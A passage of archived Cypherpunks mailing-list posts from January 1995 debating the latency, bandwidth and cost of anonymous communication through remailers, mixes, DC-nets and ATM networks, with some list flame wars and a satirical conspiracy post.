1.3 MB FAQ, clearly can be delayed for hours or days with no real loss, save impatience. My contention is that network speeds--ISDN, Mosaic usage, faster modems, direct connections--are being set up and that "urgent-but-small" messages will fit in nicely, and with low latency through remailers. In the next several years, that is.) What this means is that networks of the future, set up to handle huge files, video-on-demand, etc., will allow text messages to be carried almost unnoticeably. Interstitially, if you will. Reordering still requires N messages (whatever N may be), so it is true that remailer sites must still have some traffic. But this doesn't have to introduce latencies that are unacceptable. (If this isn't clear, what I mean by the situation about large files being shipped is that there should be little cost for users circulating their own dummy messages through remailer chains. Digital postage will cost, but costs will drop. Lots of tradeoffs here. No point in me or any of us trying to anticipate costs, volumes, etc., as these will evolve and the market will decide.) --Tim May -- .......................................................................... Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at netcom.com | anonymous networks, digital pseudonyms, zero | knowledge, reputations, information markets, W.A.S.T.E.: Aptos, CA | black markets, collapse of governments. Higher Power: 2^859433 | Public Key: PGP and MailSafe available. Cypherpunks list: majordomo at toad.com with body message of only: subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay From roy at cybrspc.mn.org Sat Jan 7 11:54:26 1995 From: roy at cybrspc.mn.org (Roy M. Silvernail) Date: Sat, 7 Jan 95 11:54:26 PST Subject: cel fraud In-Reply-To: <9501071759.AA00953@anon.penet.fi> Message-ID: <950107.134210.3m7.rusnews.w165w@cybrspc.mn.org> -----BEGIN PGP SIGNED MESSAGE----- In list.cypherpunks, an172607 at anon.penet.fi writes: > AT&T's Steve Fleischer, speaking to Newsbytes, said such cloning operations > have become such a successful criminal industry that some criminals sell the > phones with 30-day guarantees. > > "If a number is cut off, you can bring it back to the cellular bandits and > have it reprogrammed for no additional charge," he explained. "It costs the > carriers around $1 million a day." > > He paused, then added: "It just shows how big a demand there is for wireless > communications." Does anyone else think this is funny (in both senses of the word)? The cell-phraud system shows a demand for cheap, though illegal, phone service. The wireless aspect is pretty much incidental to the fraud aspect, no? - -- Roy M. Silvernail [ ] roy at cybrspc.mn.org PGP public key available by mail echo /get /pub/pubkey.asc | mail file-request at cybrspc.mn.org These are, of course, my opinions (and my machines) -----BEGIN PGP SIGNATURE----- Version: 2.6.1 iQCVAwUBLw7vEhvikii9febJAQGLlgQAiteZ/51syb6gSkiwWMLs9oQ+99hMxbps L7rshpeQ0xDM7GN+Szz4PiQ4CQrqMlxxkvgppsrRbU2E5WPv8IGvW9pa6gWx8Y9B H/ZwmjSz1lIMCATh5osFt9myK3nkwHasxjGYqpyJJwcbTd+rQi8/lIv1EYcxv+HX qtiHdjrFvbE= =D0AH -----END PGP SIGNATURE----- From cjl at welchlink.welch.jhu.edu Sat Jan 7 12:18:49 1995 From: cjl at welchlink.welch.jhu.edu (cjl) Date: Sat, 7 Jan 95 12:18:49 PST Subject: pgp shells for windows.... In-Reply-To: Message-ID: On Sat, 7 Jan 1995, Oren Tanay wrote: [PGP Windoze front-end request. . .] In response to a similar question a wiser head than mine suggested looking in ftp to unix.hensa.ac.uk/pub/uunet/pub/security/virus/crypt/pgp/shells C. J. Leonard ( / "DNA is groovy" \ / - Watson & Crick / \ <-- major groove ( \ Finger for public key \ ) Strong-arm for secret key / <-- minor groove Thumb-screws for pass-phrase / ) From weidai at eskimo.com Sat Jan 7 12:51:25 1995 From: weidai at eskimo.com (Wei Dai) Date: Sat, 7 Jan 95 12:51:25 PST Subject: Latency Costs of Anonymity In-Reply-To: <199501071950.LAA22106@netcom17.netcom.com> Message-ID: On Sat, 7 Jan 1995, Timothy C. May wrote: > The good news is that many of the messages that people want > anonymity for are *text* files, e.g., offers of services, > controversial data or opinions, etc. > > There's a kind of tradeoff in size and urgency. To wit, it is seldom > "urgent" that a 1 MB or 100 MB or whatever file get through. (Sorry I > can't draw my favorite little diagram here showing the space of > messages, with "urgency" and "size" as the axes.) The points Tim makes here are quite good. However, I'm more concerned with a slightly longer time scale, when people focus less on FILES, but more on CONVERSATIONS and INTERACTIONS. It is then that latency becomes more problematic. Can anyone give me an estimate of when truly anonymous video conferencing will become possible? This is not just to help me make the point, but I'm really wondering. Wei Dai From mikepb at freke.lerctr.org Sat Jan 7 14:09:35 1995 From: mikepb at freke.lerctr.org (Michael P. Brininstool) Date: Sat, 7 Jan 95 14:09:35 PST Subject: SAN FRANCISCO EDITORIAL In-Reply-To: Message-ID: <1995Jan7.134217.22470@freke.lerctr.org> -----BEGIN PGP SIGNED MESSAGE----- In article sandfort at crl.com (Sandy Sandfort) writes: >~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ > >C'punks, > >Here is a guest editorial that ran in Monday's SF Chronicle. It >should make your blood boil. Is anyone going to write rebuttals? Would the SF Chronicle print them? As I read this, I only saw the following propaganda: > ANARCHY, CHAOS ON THE INTERNET MUST END in Cyberspace, there is not much order. It is governed by no one. ... being left to the equivalent of mob rule. the need for firm direction is all too obvious. ... unregulated broadcasting ..., sexual harassment, profanity, defamation, forgery and fraud ... secretiveness is why abuse is easy. problems are further exacerbated by Anonymous Server, which launders computer messages, like money is laundered. ... difficulties in commercialization. turf war rages between factions ... attacks on business people ... vandalism, persist uncontrolled. Worst of all are the ``canceller robots,'' ... the communications the hackers wish to silence. vigilantes routinely challenge free speech unabated ... access providers, assume the role of censors, arbitrarily closing accounts of those whom they disapprove. one obvious way to bring much needed order, is through diplomacy. The United States should lead in this. ... urge the Finnish government to deactivate the Anonymous Server. establish a standard of recognizing laws existing at the point of origin as controlling the message sender. When conflicts arise, governmental diplomacy should again be the answer, just as it is with other trade and communications issues. Next, laws already regulating behavior in the real world should be applied in Cyberspace. The Supreme Court should act ... stating that crime is crime, even when the criminal instrument is a computer keyboard. legislation should be passed making access providers common carriers. This will get them and under the guiding hand of the FCC ... People need safety and order in Cyberspace just as they do in their homes and on the streets. The current state makes it clear that anarchy isn't working. If governments don't bring order, chaos may soon dictate. !@&^%&^!%@&$^%&^@%$&^!@$ I wish I could write worth beans. I have never been publish in any newspaper, anywhere. They never like my rebuttals. I guess I get too rabid when I write. - ---------------------------------------------------------| | #include "std/disclaimer.h" Michael P. Brininstool | | mikepb at freke.lerctr.org OR mikepb at netcom.com | |--------------------------------------------------------- -----BEGIN PGP SIGNATURE----- Version: 2.9 alpha I - BACK UP YOUR KEYRING BEFORE USE iQCVAgUBLw8KT1gtYer4uLCdAQFLnQP/ZxwEsLtssYkk7F58v/ITcj9dx/Utyl4m RzIdsgdg98h0c0WzDsXm2ZxKOK7rcucSMx+UF94jc0qVyTLk3T13Hm1n86WRJHSL 6vDdKiKP50WqjHg+1cBSMs9DOer/Q2wOCznMPK8LobYLII43YY2cvWhCt8JSC8o+ QpVkdv7IRqA= =b3pW -----END PGP SIGNATURE----- From nesta at nesta.pr.mcs.net Sat Jan 7 14:57:34 1995 From: nesta at nesta.pr.mcs.net (Nesta Stubbs) Date: Sat, 7 Jan 95 14:57:34 PST Subject: Killfiles 101 In-Reply-To: Message-ID: On Sat, 7 Jan 1995, Carol Anne Braddock wrote: all responses and replys and nosensical remarks to this post can be taken off the cypherpunks list and directed to me carol, or whomever decides to respond, unless of course something productive pops out of it. > > 1. The best and only way you can be sure you're > killing a file is to turn your machine off. > Only then can you be sure it is dead. > wow, she knows about puns, cool. > 2. If you must resort to using killfiles, > (great marketer trick, make you use it > again and again, and again, like a gun) > kill "classes" of files, as opposed to > individuals, you'll get better kill ratio. > A good example is anon or wizvax users. > class of users are to vague and I fear I may kill something I want to read. I have never came toa a point where i knew all posts from such and site site or class of users was not worth my time, but I have run across dozens of individuals who I realized said nothing I wanted to waste a "d" or "n" keystroke on. > 3. Note: Killfiles are a censor's best friend! > And you'll become what you swore you wouldn't. > Bullshit, you sound like Doctress fuckin Nuetopia. Kill files are not censorship at all, do you pay attention to everythign that coems your way? Do you read every last scrap of paper people put in front of you? Do you go out and buy every fuckin perdiodical just in case there is an article in them you want, or are you intelligent enough to make judgemnets to conserve your time and sanity by not wasting your time on information resources you know will bring nothing too you. If I really wanted to censr or kill you Carol, and not simply avoid having to "d" thru a good thrity messages I don't want to read, you wouldn't be replying to this at all dear. > does your signature tell the truth nesta? Can't know everything > with a killfile! Eventually you'll kill the file that'd get you sex. So far your posts have told me nothing I didnt already know. Damn Carol, I was on your side until you started to REALLY SPAM. i want to know everything http://www.mcs.com/~nesta/home.html i want to be everywhere Nesta's Home Page i want to fuck everyone in the world & i want to do something that matters /-/ a s t e zine From tcmay at netcom.com Sat Jan 7 14:58:36 1995 From: tcmay at netcom.com (Timothy C. May) Date: Sat, 7 Jan 95 14:58:36 PST Subject: Latency Costs of Anonymity In-Reply-To: Message-ID: <199501072258.OAA28744@netcom4.netcom.com> Wei Dai wrote: > The points Tim makes here are quite good. However, I'm more concerned > with a slightly longer time scale, when people focus less on FILES, > but more on CONVERSATIONS and INTERACTIONS. It is then that latency > becomes more problematic. > > Can anyone give me an estimate of when truly anonymous video conferencing > will become possible? This is not just to help me make the point, but > I'm really wondering. I didn't know you meant real-time conversations and interactions. These are indeed very hard to get acceptable latency on in mixes. Defeating traffic analysis in such a case is highly problematic, at least with conventional remailers. (Unconventional remailers, such as a dedicated telephone "traffic scrambler," with lots of internal bandwith between nodes, could work. Obviously a lot of other traffic would have to be flowing in and out.) The tradeoffs are best analyzed with an actual mathematical model of nodes, traffic rates, clumping of traffic, etc., rather than our hand-waving here (hand-waving is OK for broad conceptual points, but not in cases like this). I'll be interested in what others calculate, but I think "conversation mixes" are several years off, at best. The upcoming demo of Voice PGP by Phil Zimmermann (scheduled to appear at the Demo Day meeting next Saturday) may be a step in this direction. BTW, to my graph in my last post we could add a z-axis representing "value." Roughly, how much per unit of data transmitted. The crypto-canonical "Attack at dawn" message might easily be worth many dollars per byte to transmit untraceably, whereas a casual phone conversation between Alice and Bob may not be worth (to them, separately or in combination) much more than a few cents per kilobyte transmitted. In other words, there are economic as well as technologic reasons I doubt we'll see low-latency, high-bandwidth audio or video remailers anytime soon. (As we're seeing now: short messages can get through in tens of seconds, But like I said, some calculations are called for. I'd start by analyzing the existing voice-over-Internet systems, the packet sizes, and so forth. My suspicion is that Alice and Bob cannot defeat traffic analysis while ~10K bits per second are flowing continuously between them (audio), at least not until _many_ subnetworks are _much_ faster. Also, the CPU loads would be great (= costly)). Video is even further off. Tricks to reduce bandwidth may help. The digital mixes implicitly assumed in "True Names"--the year before Chaum published his seminal mix paper--are a ways off. --Tim May -- .......................................................................... Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at netcom.com | anonymous networks, digital pseudonyms, zero | knowledge, reputations, information markets, W.A.S.T.E.: Aptos, CA | black markets, collapse of governments. Higher Power: 2^859433 | Public Key: PGP and MailSafe available. Cypherpunks list: majordomo at toad.com with body message of only: subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay From hfinney at shell.portal.com Sat Jan 7 14:59:27 1995 From: hfinney at shell.portal.com (Hal) Date: Sat, 7 Jan 95 14:59:27 PST Subject: Latency Costs of Anonymity Message-ID: <199501072300.PAA25794@jobe.shell.portal.com> -----BEGIN PGP SIGNED MESSAGE----- From: Wei Dai > The points Tim makes here are quite good. However, I'm more concerned > with a slightly longer time scale, when people focus less on FILES, > but more on CONVERSATIONS and INTERACTIONS. It is then that latency > becomes more problematic. I think this is a good point. We have had some discussions about getting anonymity with web browsing. The "mix" or "remailer" concept doesn't work so well there as the connections are very short, so there is less chance of multiple communications going on at one time. OTOH I have heard discussions of asynchronous transfer mode, ATM, as a new packet-based network technology that could support high bandwidth communications. All messages, presumably even streams like video signals, get broken into fixed-size packets, which make their way through the network and are reassembled into a stream on the other end. The individual packets may not all take the same path through the network. (I am far from an expert on ATM so I welcome corrections to this description.) This technology does sound like mixing could work pretty well to provide anonymity. There is some price in bandwidth and latency but ATM is so fast that probably several steps of chaining and mixing would be possible. Naturally such mixes would have to be hardware based due to the rapid speeds of the packets. So this would be kind of a "souped up" version of our current email remailer network, with vastly greater bandwidths and switching speeds. Another possibility with connection-based communications would be Chaum's DC-Nets. These are networks where message source cannot be determined. They do face potentially severe costs in terms of bandwidth, though, depending on how much anonymity you get. As both mixes and dcnets have bandwidth costs, I wonder if it is provable that anonymity implies such costs. > Can anyone give me an estimate of when truly anonymous video conferencing > will become possible? This is not just to help me make the point, but > I'm really wondering. > > Wei Dai I think it may be more useful rather than speaking of "true" anonymity to think of factor-of-N anonymity. This reflects the bandwidth costs. I would guess that, if you have a packet-based video converencing system, that today you could probably get factor-of-2 anonymity with custom hardware, and perhaps even more than that. One other point I would make, based on Wei's original post, is that no doubt anonymity does exact some costs. However this does not mean that it is uncompetitive. It also may have, in some circumstances, advantages. People may be more frank and critical when they are shielded by anonymity. I've read articles about companies which introduce electornic "suggestion boxes" where people can post anonymously, and upper management is often shocked at the results. It is too early to judge how much of a net benefit or harm anonymity will be in general. Furthermore, it is likely that the net advantage will differ depending on the business or organization. At one extreme, a group working with illegal or restricted technology would probably benefit more from anonymity. I think it was Keith Henson who posted a story here a couple of years ago that he was working on, involving some kind of underground protest group which organized itself using crypto anonymity. So it is really not a question of whether anonymity is good or bad, but rather whether its costs outweigh its advantages in a particular situation. Hal Finney hfinney at shell.portal.com -----BEGIN PGP SIGNATURE----- Version: 2.6 iQBVAwUBLw8c9xnMLJtOy9MBAQFZBgH/R1c3FLHECJiEHDoUl/gUPaBIVzd3kvVz Uv2jqFwJxSFQjnrb1wtGT7vLjNOOXJ7uYpBNJU+ZfPSKOvPgGFD8yQ== =+6iw -----END PGP SIGNATURE----- From jsled at free.org Sat Jan 7 14:59:43 1995 From: jsled at free.org (Josh Michael Sled) Date: Sat, 7 Jan 95 14:59:43 PST Subject: Chinese EBS Message-ID: <199501072319.RAA03833@squeaky.free.org> -----BEGIN PGP SIGNED MESSAGE----- I've been reading through "Applied Cryptography," as every good boy and girl should :) and one of the concepts struck out at me recently. The idea of the Chinese Lottery seemed to be rather far fetched in my first few readings, but then I came across the discussion of the new Emergency Broadcast System. This may just be an unfair helping of paranoia, but the system seems to be a perfect distribution system for a Chinese Lottery-like keychecking or cracking system. Even though the public can turn off the broadcast, the signal will still be sent. The chips may even be government-regulated... available only from the government so no one can tamper with the signal and use this system for their own information-disemination needs (*ahem* Political agendas *ahem* re-election ads). They might even encrypt the signals, for a touch of irony. Anyone find fault in this? - -Joshua M. Sled -----BEGIN PGP SIGNATURE----- Version: 2.6 iQCVAgUBLw3WJqTT29daLBKRAQFbRgP/RAhGdEmxMe4zOuLORY9rKu7VhapXen7S 6+cVOvrlOxJ2ohCmxZpXbwKY9oR6ggF1jURwb9LZEiHPfzaOOsftURxcmJUsC2db 1vkSRuBarkm6vOK+JIlLMwKzRdk9omt+TmJPD7/wI5M1jhMfLRNS+fkbEpDFtisn 0s1H2nvXdDs= =kGbJ -----END PGP SIGNATURE----- --- � KWQ/2 1.2g NR � "MTV get off the air!" - DKs From tcmay at netcom.com Sat Jan 7 15:38:25 1995 From: tcmay at netcom.com (Timothy C. May) Date: Sat, 7 Jan 95 15:38:25 PST Subject: Don't Say Anything More in Public! In-Reply-To: <199501072319.RAA03833@squeaky.free.org> Message-ID: <199501072338.PAA04770@netcom4.netcom.com> Josh Michael Sled wrote: ... > The idea of the Chinese Lottery seemed to be rather far fetched in my > first few readings, but then I came across the discussion of the new > Emergency Broadcast System. > > This may just be an unfair helping of paranoia, but the system seems > to be a perfect distribution system for a Chinese Lottery-like > keychecking or cracking system. Even though the public can turn off the > broadcast, the signal will still be sent. The chips may even be > government-regulated... available only from the government so no one can > tamper with the signal and use this system for their own > information-disemination needs (*ahem* Political agendas *ahem* > re-election ads). They might even encrypt the signals, for a touch of > irony. Anyone find fault in this? Josh, I'm sending this note to you privately--please don't comment anymore in public on this! You could be undermining national insecurity by revealing this system! More than just key-crackers are included in the Emergency Broadcast System boxes. In addition, the red LED acts just as the LEDs on cable set-top boxes act, namely, as an infrared sensor. These LEDs can count the numbers of citizen-units in the same room as the unit, and can of course even detect the thermal signature of drug abuser (flushed skin, dilated eyes, etc.). The key-cracking functions are only incidental. In fact, they may not even be cost-effective. I was told last year by the NSA's A.U.N.T.I.E. (Authorization Unit for Non-Terminal Industrial Enterprises) group that the real key-cracking crunch is contained in the *Clipper* phones, which of course have crypto modules and can do all the right calculations. They can also occasionally dial the Clipper phone ("Sorry, wrong number.") and check on the progress of calculations. Mysterious phone calls in the middle of the night should rightly worry folks--it may mean your number's up. But don't discuss this on the list! If you do, she'll have us killed. (And don't call her Dotty!) --Klaus! von Future Prime, being channelled by Carol Moore^H^H^H^H^HAnne Braddock From greg at ideath.goldenbear.com Sat Jan 7 15:45:24 1995 From: greg at ideath.goldenbear.com (Greg Broiles) Date: Sat, 7 Jan 95 15:45:24 PST Subject: Anonymity and cost Message-ID: <199501072330.AA30350@ideath.goldenbear.com> -----BEGIN PGP SIGNED MESSAGE----- Wei Dai writes: > Anonymous e-mail that goes through a chain of N remailers will cost at > least N times as much bandwidth and have N times as much latency as normal > e-mail. But e-mail is hardly the state-of-the-art of network > communication, while anonymous e-mail IS the state of the art for > anonymous communication. How long will it take for the technology of > anonymous video conferencing to develope, for example? By then, of > course, those who are not concerned with anonymity will probably have > things such as full sensory virtual interaction. At a very basic level, anonymous (not pseudonymous, like the remailers are) messages are *cheaper*, because they carry less information; they do not need to send the bits which identify the sender. This conversation seems to elide distinctions between low-level anonymity (where source information is simply not transmitted) and high-level anonymity, where source information is transmitted but is not used for social or political reasons. Anonymous remailers are considered "anonymous" because (some of us) agree that we won't treat the "From:" line as indicating the real author of the text below. We agree this because we know how remailers work; we know that (probably) the person who wrote the message isn't the same person as the owner of the "From:" address. When we say a message is "anonymous" we mean that its real author should not/cannot be connected with the text of the message. We could just as easily agree on an "Identify-Author:" header field by which authors could indicate whether or not they wished to be speaking "on the record" when they wrote the message. A multi-hop message where the "From:" line changes with each hop costs almost precisely what a multi-hop message would cost without the "From:" line changes. Folks feeling detail-oriented can calculate the cost of the CPU time to strip header information vs. the cost of sending that header information to the next hop. I don't care about the answer, so I'm not going to. Anonymous video conferencing is available now; go to Kinko's, pay cash for the use of their video conference room. Or, ask/convince the recipient to consider the conversation "off the record". Current remailer operators experience a cost in that they receive some amount of hassle and exposure to liability by running remailers; but this is merely a "cost" shifted from one person (the author) to another, the surrogate author. This may look like a cost of anonymity but it's more accurately described as the cost of being provocative or rude or illegal. -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBLw8j133YhjZY3fMNAQGB5QP9HCgA2QiHLPVupVgOeU/Tez5SH8Ie3ch3 nSJreSYl3a97blPr/aI1Yx577EQuCwrHoyZKWWpVc/8u728i10gTbJPbavzpDBOw i3JawSt4+d/tMWBfLzYHzdrVALIcTZeGnmLLbfgzWzzC8NUDsDG/ppDB7sDq2ktf NiwvDeQzoYk= =oU42 -----END PGP SIGNATURE----- From nesta at nesta.pr.mcs.net Sat Jan 7 15:53:56 1995 From: nesta at nesta.pr.mcs.net (Nesta Stubbs) Date: Sat, 7 Jan 95 15:53:56 PST Subject: The first reply came 3 days later. In-Reply-To: Message-ID: >From my present calcuations approximately 14 percent of my mail for the last two days has been form Carol Ann, this is not a small feat co9nsidering the amount of mailing I usually recieve. Perhaps if Carol would post a well thoguth out and written article on what happened, instead of posting a thousand little "me toos" and "told ya so's" and such, this wouldn't be so annoying. rough estimate of mine is that she is repsonsible for 30 some percent of the traffic on cypherpunks at this time. Worse par tis that because i recieve my mail thru a SLIP lin which is admittedly slow, I still have to recieve all noise messages thru my SLIP link before procmail can trash/delete/redirect them. SO now taking this into consideration, it seems that Carol Ann is responsible for more thruput on my SLIP link the myself, since mostly I recive mail thru it. It's a close call, me or Carol, that's counting in FTPs and WWW browing. I mean maybe I hsould charge her money now 8) i want to know everything http://www.mcs.com/~nesta/home.html i want to be everywhere Nesta's Home Page i want to fuck everyone in the world & i want to do something that matters /-/ a s t e zine From tcmay at netcom.com Sat Jan 7 16:18:40 1995 From: tcmay at netcom.com (Timothy C. May) Date: Sat, 7 Jan 95 16:18:40 PST Subject: Anonymity and cost In-Reply-To: <199501072330.AA30350@ideath.goldenbear.com> Message-ID: <199501080018.QAA11241@netcom4.netcom.com> Greg Broiles wrote: > At a very basic level, anonymous (not pseudonymous, like the remailers > are) messages are *cheaper*, because they carry less information; they > do not need to send the bits which identify the sender. I think the meaning of "anonymous" here is clearly with respect to _traffic analysis_. The "cost of anonymity" is with respect to the costs and delays of using digital mixes (remailers)). The relatively few bytes of header information don't affect the cost in any substantive way. > This conversation seems to elide distinctions between low-level > anonymity (where source information is simply not transmitted) and > high-level anonymity, where source information is transmitted but is > not used for social or political reasons. Again, traffic analysis is the issue. (And I don't necessarily mean NSA-type traffic analysis...Net-savvy investigators can trace messages back to origins even when a message is ostensibly anonymous. So far as I know, some form of mix/remailer is needed to ensure anonymity.))0 > A multi-hop message where the "From:" line changes with each hop > costs almost precisely what a multi-hop message would cost without > the "From:" line changes. Folks feeling detail-oriented can calculate > the cost of the CPU time to strip header information vs. the cost of > sending that header information to the next hop. I don't care about > the answer, so I'm not going to. ??? This is not the "cost" that is being discussed. Stripping or changing headers is a trivial cost compared to the latency delays that may result when mix reordering is done (how much latency is involved is a function of several things, including reordering desired ("N"), amount of other traffic). > Anonymous video conferencing is available now; go to Kinko's, pay > cash for the use of their video conference room. Or, ask/convince > the recipient to consider the conversation "off the record". Neither of these kinds of "anonymity" are cryptographically interesting, or strong. --Tim May -- .......................................................................... Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at netcom.com | anonymous networks, digital pseudonyms, zero | knowledge, reputations, information markets, W.A.S.T.E.: Aptos, CA | black markets, collapse of governments. Higher Power: 2^859433 | Public Key: PGP and MailSafe available. Cypherpunks list: majordomo at toad.com with body message of only: subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay From weidai at eskimo.com Sat Jan 7 16:37:54 1995 From: weidai at eskimo.com (Wei Dai) Date: Sat, 7 Jan 95 16:37:54 PST Subject: Latency, bandwidth, and anonymity In-Reply-To: <199501072258.OAA28744@netcom4.netcom.com> Message-ID: On Sat, 7 Jan 1995, Timothy C. May wrote: > The tradeoffs are best analyzed with an actual mathematical model of > nodes, traffic rates, clumping of traffic, etc., rather than our > hand-waving here (hand-waving is OK for broad conceptual points, but > not in cases like this). Are there any theoritical tools developed especially for this type of analysis? If so, can anyone provide some references? > I'll be interested in what others calculate, but I think "conversation > mixes" are several years off, at best. The upcoming demo of Voice PGP > by Phil Zimmermann (scheduled to appear at the Demo Day meeting next > Saturday) may be a step in this direction. Secrecy will of course have to come before anonymity. I am eagerly awaiting Voice PGP, but unfortuanately can't make the Demo Day meeting. Will someone please report the highlights? > In other words, there are economic as well as technologic reasons I > doubt we'll see low-latency, high-bandwidth audio or video remailers > anytime soon. (As we're seeing now: short messages can get through in > tens of seconds, So, the situation: high-latency, low-bandwidth e-mail remailers the goal: low-latency, high-bandwidth interactive A/V type anonymity, but this seems too far away Perhaps we can tackle the problems of latency and bandwidth seperately. That is, develop 2 sets of anonymity tools: 1. low-latency, low-bandwidth, for use in textual interactions such as MUD and IRC 2. high-latency, high-bandwidth, for non-interactive A/V use, perhaps anonymous TV broadcasting I'm not too familiar with DC-nets, but they can probably be used as tool set #1. (correct me if i'm wrong) How about tool set number 2? > My suspicion is that Alice and Bob cannot defeat traffic analysis > while ~10K bits per second are flowing continuously between them > (audio), at least not until _many_ subnetworks are _much_ > faster. Also, the CPU loads would be great (= costly)). Video is even > further off. Tricks to reduce bandwidth may help. Indeed, Vinge makes use of such a trick in True Names. If I remember correctly, the technology in the story includes the ability to compress full virtualy reality type interactions down to a few hundred bytes per second! (maybe is was thousands, but either way it seems unlikely) Vinge seems to be a stronger believer of compression. There is a similar technology in A Fire Upon the Deep. From tcmay at netcom.com Sat Jan 7 17:00:48 1995 From: tcmay at netcom.com (Timothy C. May) Date: Sat, 7 Jan 95 17:00:48 PST Subject: Latency, bandwidth, and anonymity In-Reply-To: Message-ID: <199501080059.QAA19944@netcom10.netcom.com> Wei Dai wrote: ... > Are there any theoritical tools developed especially for this type > of analysis? If so, can anyone provide some references? No, this is too small a community for such tools to exist off-the-shelf. Start with the standard mix papers, mentioned here often. Also, Hal Finney made a first stab at a more careful calculation of just how well remailer's do their job...this was about half a year ago, as I recall. > So, the situation: high-latency, low-bandwidth e-mail remailers > the goal: low-latency, high-bandwidth interactive A/V type anonymity, but > this seems too far away The goal for whom? I find IRC a waste of time, so "anonymous audivisual" is not even on my radar screen of things of interest. I think it's >10 years off. > Perhaps we can tackle the problems of latency and bandwidth seperately. > That is, develop 2 sets of anonymity tools: > 1. low-latency, low-bandwidth, for use in textual interactions such as MUD > and IRC > 2. high-latency, high-bandwidth, for non-interactive A/V use, perhaps > anonymous TV broadcasting Think market. I don't see anyone paying for this until costs drop dramatically. --Tim May -- .......................................................................... Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at netcom.com | anonymous networks, digital pseudonyms, zero | knowledge, reputations, information markets, W.A.S.T.E.: Aptos, CA | black markets, collapse of governments. Higher Power: 2^859433 | Public Key: PGP and MailSafe available. Cypherpunks list: majordomo at toad.com with body message of only: subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay From weidai at eskimo.com Sat Jan 7 17:08:42 1995 From: weidai at eskimo.com (Wei Dai) Date: Sat, 7 Jan 95 17:08:42 PST Subject: Latency Costs of Anonymity In-Reply-To: <199501072300.PAA25794@jobe.shell.portal.com> Message-ID: On Sat, 7 Jan 1995, Hal wrote: > This technology does sound like mixing could work pretty well to provide > anonymity. There is some price in bandwidth and latency but ATM is so > fast that probably several steps of chaining and mixing would be > possible. Naturally such mixes would have to be hardware based due to the > rapid speeds of the packets. So this would be kind of a "souped up" > version of our current email remailer network, with vastly greater > bandwidths and switching speeds. The problem here is that you'll have to do a RSA operation on EACH packet. Pretty hard on the CPU... > I think it may be more useful rather than speaking of "true" anonymity > to think of factor-of-N anonymity. This reflects the bandwidth costs. I > would guess that, if you have a packet-based video converencing system, > that today you could probably get factor-of-2 anonymity with custom > hardware, and perhaps even more than that. I'm not exactly sure what you mean by "factor-of-N". I only used "true" to distiguish it from "trivial" anonymity (such as using a pay phone). Of course, anonymity, like security, can only be relative. > One other point I would make, based on Wei's original post, is that no > doubt anonymity does exact some costs. However this does not mean that > it is uncompetitive. It also may have, in some circumstances, > advantages. People may be more frank and critical when they are shielded > by anonymity. I've read articles about companies which introduce > electornic "suggestion boxes" where people can post anonymously, and > upper management is often shocked at the results. It is too early to > judge how much of a net benefit or harm anonymity will be in general. > > Furthermore, it is likely that the net advantage will differ depending on > the business or organization. At one extreme, a group working with > illegal or restricted technology would probably benefit more from > anonymity. I think it was Keith Henson who posted a story here a couple > of years ago that he was working on, involving some kind of underground > protest group which organized itself using crypto anonymity. So it is > really not a question of whether anonymity is good or bad, but rather > whether its costs outweigh its advantages in a particular situation. This is all very true. I guess I'm just lamenting the loss of my ealier, more naive dream that one day everyone will be anonymous (read pseudonymous), and that physical and digital identities will be totally seperate. Wei Dai Who should really start signing his posts but left his key in another computer. From klp at epx.cis.umn.edu Sat Jan 7 17:50:26 1995 From: klp at epx.cis.umn.edu (klp at epx.cis.umn.edu) Date: Sat, 7 Jan 95 17:50:26 PST Subject: Carol Anne Whoever In-Reply-To: Message-ID: <0012f0f4513022117@epx.cis.umn.edu> According to legend, Jonathan Rochkind said: > [I'm beginning to suspect that Carol Anne, and her sysadmin too, are just > tentacles of Detweiler.] Actually (unfortunatly?) I can confirm the fact that Carol Anne, and Mike are >not< Detweiler, CA by personally knowledge, and Mike by reputation. Just thought I'd toss that out for the viewing public, and go back to my 'no comment' stance on the whole rest of the deal... -- Kevin Prigge internet: klp at epx.cis.umn.edu CIS Consultant MaBellNet: (612)626-0001 Computer & Information Services SneakerNet: 152 Lauderdale From weidai at eskimo.com Sat Jan 7 18:02:18 1995 From: weidai at eskimo.com (Wei Dai) Date: Sat, 7 Jan 95 18:02:18 PST Subject: Latency, bandwidth, and anonymity In-Reply-To: <199501080059.QAA19944@netcom10.netcom.com> Message-ID: On Sat, 7 Jan 1995, Timothy C. May wrote: > > Perhaps we can tackle the problems of latency and bandwidth seperately. > > That is, develop 2 sets of anonymity tools: > > 1. low-latency, low-bandwidth, for use in textual interactions such as MUD > > and IRC > > 2. high-latency, high-bandwidth, for non-interactive A/V use, perhaps > > anonymous TV broadcasting > > Think market. I don't see anyone paying for this until costs drop > dramatically. Oops, I didn't mean to exhort anyone to actually make the tools, but was just thinking about the feasibilities. (I know, "Cypherpunks write code", not "Cypherpunks convince others to write code." ;) OTOH, I DO think people with anonymity needs will pay for lower latency and/or higher bandwidth (right now probably tool set #1 will have a greater demand, given the heavy use of MUDs and IRC). In the longer term, anonymous communication is in danger of being used only by fringe groups if it falls too much behind the non-anonymous kind in terms of latency and bandwidth (and cost, I guess). Maybe ONLY drug dealers, nuclear terrorists, etc., will use anonymous remailers when full sensory virtual interaction is the must popular way for most people to communicate and remailers are still the only choice for the anonymity-conscious. By then, the remailers themselves will be in danger of being outlawed, or just close down for lack of business. > I find IRC a waste of time, so "anonymous audivisual" is not even on my > radar screen of things of interest. I think it's >10 years off. I think limited virtual interaction can be available on the Internet in 5 years (in prototype), so I sure hope anonymous A/V is not that far off. I know, I know, the market will decide... But second guessing the market can be fun and sometimes profitable. Just look at all those people trying to make money on the stock market. Sorry if I'm hammering the subject to death... Wei Dai From hfinney at shell.portal.com Sat Jan 7 18:40:47 1995 From: hfinney at shell.portal.com (Hal) Date: Sat, 7 Jan 95 18:40:47 PST Subject: Latency Costs of Anonymity Message-ID: <199501080241.SAA13329@jobe.shell.portal.com> -----BEGIN PGP SIGNED MESSAGE----- From: Wei Dai > [My idea for ATM 